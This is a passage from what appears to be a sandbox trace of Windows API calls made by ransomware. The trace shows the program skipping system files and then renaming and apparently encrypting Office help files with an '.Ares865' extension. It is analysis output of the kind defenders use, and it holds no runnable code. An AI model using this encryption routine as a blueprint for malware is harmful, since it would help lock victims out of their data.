[0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.445] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.445] CloseHandle (hObject=0x15c) returned 1 [0083.445] CloseHandle (hObject=0x118) returned 1 [0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.445] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0083.445] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.445] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.445] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".") returned 1 [0083.445] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="..") returned 1 [0083.445] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="windows") returned -1 [0083.445] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="temp") returned -1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="boot") returned 1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="perflogs") returned -1 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.446] lstrlenW (lpString="MS.MSACCESS.DEV.14.1033.hxn") returned 27 [0083.446] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0083.446] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="MS.MSACCESS.DEV.14.1033.hxn") returned="MS.MSACCESS.DEV.14.1033.hxn" [0083.446] lstrlenW (lpString="MS.MSACCESS.DEV.14.1033.hxn") returned 27 [0083.446] lstrlenW (lpString="Ares865") returned 7 [0083.446] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.446] lstrlenW (lpString=".dll") returned 4 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".dll") returned 1 [0083.446] lstrlenW (lpString=".lnk") returned 4 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".lnk") returned 1 [0083.446] lstrlenW (lpString=".ini") returned 4 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".ini") returned 1 [0083.446] lstrlenW (lpString=".sys") returned 4 [0083.446] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".sys") returned 1 [0083.446] lstrlenW (lpString="MS.MSACCESS.DEV.14.1033.hxn") returned 27 [0083.446] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.Ares865") returned 69 [0083.446] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.447] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=368) returned 1 [0083.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.448] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.448] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.448] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.449] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x15c [0083.450] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0083.451] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.452] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.452] CloseHandle (hObject=0x15c) returned 1 [0083.452] CloseHandle (hObject=0x118) returned 1 [0083.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.453] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="..") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="windows") returned -1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="temp") returned -1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="boot") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="perflogs") returned -1 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.453] lstrlenW (lpString="MS.MSOUC.14.1033.hxn") returned 20 [0083.453] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0083.453] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.MSOUC.14.1033.hxn" | out: lpString1="MS.MSOUC.14.1033.hxn") returned="MS.MSOUC.14.1033.hxn" [0083.453] lstrlenW (lpString="MS.MSOUC.14.1033.hxn") returned 20 [0083.453] lstrlenW (lpString="Ares865") returned 7 [0083.453] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.453] lstrlenW (lpString=".dll") returned 4 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".dll") returned 1 [0083.453] lstrlenW (lpString=".lnk") returned 4 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".lnk") returned 1 [0083.453] lstrlenW (lpString=".ini") returned 4 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".ini") returned 1 [0083.453] lstrlenW (lpString=".sys") returned 4 [0083.453] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".sys") returned 1 [0083.453] lstrlenW (lpString="MS.MSOUC.14.1033.hxn") returned 20 [0083.454] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.Ares865") returned 62 [0083.454] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.455] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.455] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326) returned 1 [0083.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.455] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.456] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.456] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.456] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.458] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.459] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.460] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.460] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.460] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.460] CloseHandle (hObject=0x15c) returned 1 [0083.460] CloseHandle (hObject=0x118) returned 1 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="..") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="windows") returned -1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="temp") returned -1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="boot") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="perflogs") returned -1 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.461] lstrlenW (lpString="MS.MSPUB.14.1033.hxn") returned 20 [0083.461] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0083.461] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.MSPUB.14.1033.hxn" | out: lpString1="MS.MSPUB.14.1033.hxn") returned="MS.MSPUB.14.1033.hxn" [0083.461] lstrlenW (lpString="MS.MSPUB.14.1033.hxn") returned 20 [0083.461] lstrlenW (lpString="Ares865") returned 7 [0083.461] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.461] lstrlenW (lpString=".dll") returned 4 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".dll") returned 1 [0083.461] lstrlenW (lpString=".lnk") returned 4 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".lnk") returned 1 [0083.461] lstrlenW (lpString=".ini") returned 4 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".ini") returned 1 [0083.461] lstrlenW (lpString=".sys") returned 4 [0083.461] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".sys") returned 1 [0083.461] lstrlenW (lpString="MS.MSPUB.14.1033.hxn") returned 20 [0083.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.Ares865") returned 62 [0083.462] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.463] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326) returned 1 [0083.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.464] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.464] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.466] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.467] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.467] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.467] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.468] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.468] CloseHandle (hObject=0x15c) returned 1 [0083.468] CloseHandle (hObject=0x118) returned 1 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="..") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="windows") returned -1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="temp") returned -1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="boot") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="perflogs") returned -1 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.469] lstrlenW (lpString="MS.MSPUB.DEV.14.1033.hxn") returned 24 [0083.469] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0083.469] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="MS.MSPUB.DEV.14.1033.hxn") returned="MS.MSPUB.DEV.14.1033.hxn" [0083.469] lstrlenW (lpString="MS.MSPUB.DEV.14.1033.hxn") returned 24 [0083.469] lstrlenW (lpString="Ares865") returned 7 [0083.469] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.469] lstrlenW (lpString=".dll") returned 4 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".dll") returned 1 [0083.469] lstrlenW (lpString=".lnk") returned 4 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".lnk") returned 1 [0083.469] lstrlenW (lpString=".ini") returned 4 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".ini") returned 1 [0083.469] lstrlenW (lpString=".sys") returned 4 [0083.469] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".sys") returned 1 [0083.469] lstrlenW (lpString="MS.MSPUB.DEV.14.1033.hxn") returned 24 [0083.469] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.Ares865") returned 66 [0083.470] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.470] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.471] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=350) returned 1 [0083.471] 